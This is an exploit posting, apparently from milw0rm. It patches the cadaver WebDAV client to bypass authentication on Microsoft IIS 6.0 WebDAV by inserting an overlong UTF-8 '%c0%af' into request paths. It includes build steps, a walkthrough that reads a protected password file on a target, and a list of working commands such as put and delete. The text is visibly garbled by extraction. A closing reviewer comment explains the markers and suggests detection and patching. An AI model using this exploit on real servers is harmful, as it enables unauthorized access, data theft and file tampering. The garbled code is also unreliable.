Microsoft IIS 6.0 WebDAV remote auth bypass exploit patch

# Blog with a detailed description: # http://www.skullsecurity.org/blog? P = 285 # And the patch itself: # http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch##> mkdir cadaver-h4x #> Cd cadaver-h4x #> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch# -- snip -- #> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz# -- snip -- #> tar xzvf cadaver-0.23.2.tar.gz # -- snip -- #> Cd cadaver-0.23.2 /#> patch-P1 <.. cadaver-0.23.2-h4x.patch # Patchi Ng file lib/neon/ne_basic.c # patching file lib/neon/ne_request.c # patching file lib/neon/ne_uri.c #>. /configure # -- snip -- #> make # -- snip -- # Now we shoshould have a patched, compiled version of cadaver, so start it # Up With the server that was identified as having a vulnerable folder # earlier: ##>. /cadaver XXX. xxx. xxx. xxx # This shoshould drop you to a "Dav:/>" prompt. now just CD into the # vulnerabl E folder and check out what's there: # Dav:/> Cd Secret # Dav:/secret/> ls # listing collection '/secret/': succeeded. # password.txt 7 May 19 10:40 # Dav:/secret/> CAT password.txt # displaying '/secret/password.txt': # Ron $ pr0ns # Dav: /secret/> # Here's a list of commands that I 've tested that work with the patched # cadaver on a vulnerable Folder: # * CD # ** ls # * move # * put # * Get # * Cat # * deletediff -Rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c --- cadaver-0.23.2/lib/neon/ne_basic.c2008-02-07 16:22:07. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_basic.c2009-05-20 16:13:46. 000000000-0500 @-402,7 + 402,7 @ value = "infinity"; break;}-ne_add_request_header (req, "depth", value); + ne_add_request_header (req, "depth", "1");} static int copy_or_move (ne_session * se SS, int is_move, int overwrite, diff-rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c --- cadaver-0.23.2/lib/neon/ne_request.c2008-01-30 05:35:52. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_request.c2009-05-20 16:35:46. 
000000000-0500 @-405, 6 + 405, 7 @ "connection: Te" EOL "te: Trailers" EOL);} + ne_buffer_czappend (req-> headers, "translate: f "EOL);} int ne_accep T_always (void * userdata, ne_request * req, const ne_status * st) @-420,6 + 421,7 @ ne_request * ne_request_create (ne_session * sess, const char * method, const char * path) {+ char * path2 = ne_calloc (strlen (PATH) + 7); ne_request * Req = ne_calloc (sizeof * req); req-> session = sess; @-435,13 + 437,18 @ req-> method = ne_strdup (method); req-> method_is_head = (strcmp (method, "head") = 0 ); + If (strlen (PATH)> 2) + spri Ntf (path2, "% C % C0 % af % s", path [0], path [1], path + 2 ); + else + path2 = path; +/* only use an absoluteuri here when absolutely necessary: Some * servers can't parse them. */-If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path [0] = '/') + If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path2 [0] = '/') req-> uri = ne_concat (req-> session-> scheme ,"://", -req-> session-> server. hostport, path, null); + req-> session-> server. hostport, path2, null); else-req-> uri = ne_strdup (PATH); + req-> uri = ne_strdup (path2); {struct hook * HK; diff-rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c --- cadaver-0.23.2/lib/neon/ne_uri.c2007-12-05 05:04:47. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_uri.c2009-05-20 16:13:46. 000000000-0500 @-+ @/* 0xxx x0 X2 X4 X6 X8 xa xc Xe * // * 0x */OT, ot, OT, ot,/* 1x */OT, ot, OT, ot,-/* 2x */OT, SD, ot, Gd, SD, PC, SD, SD, PS, SD, DS, DT, FS, ++/* 2x */OT, SD, ot, Gd, SD, Al, SD, SD, SD, PS, SD, DS, DT, FS,/* 3x */DG, DG, DG, Cl, SD, ot, SD, ot, Qu,/* 4x */At, Al, al,/* 5x */Al, Al, GD, ot, Gd, ot, US, # milw0rm.com [2009-05-21]
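Review bot: The `ne_request_create` hunk rewrites every request path with no comment saying what the inserted bytes are, and the surrounding text never states it either. Read through the extraction damage, the format string appears to place `%c0%af` (an overlong UTF-8 encoding of `/`) after the first two characters of the path, while the hunk before it appends a `Translate: f` header to every request. A comment such as `/* inserts an overlong UTF-8 '/' (%c0%af) after path[1]; sent together with "Translate: f" */` would make that explicit for anyone using this listing as a reference. Both markers travel in the request line and headers, so a TLS-terminating proxy, WAF or IDS in front of an IIS 6.0 WebDAV server can match `%c0%af` in the URI of WebDAV requests; whether the server's own access log preserves the raw sequence should be verified rather than assumed. Filtering is only a stopgap: the durable fix is to apply the vendor update for this WebDAV issue or to disable WebDAV where it is not needed.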
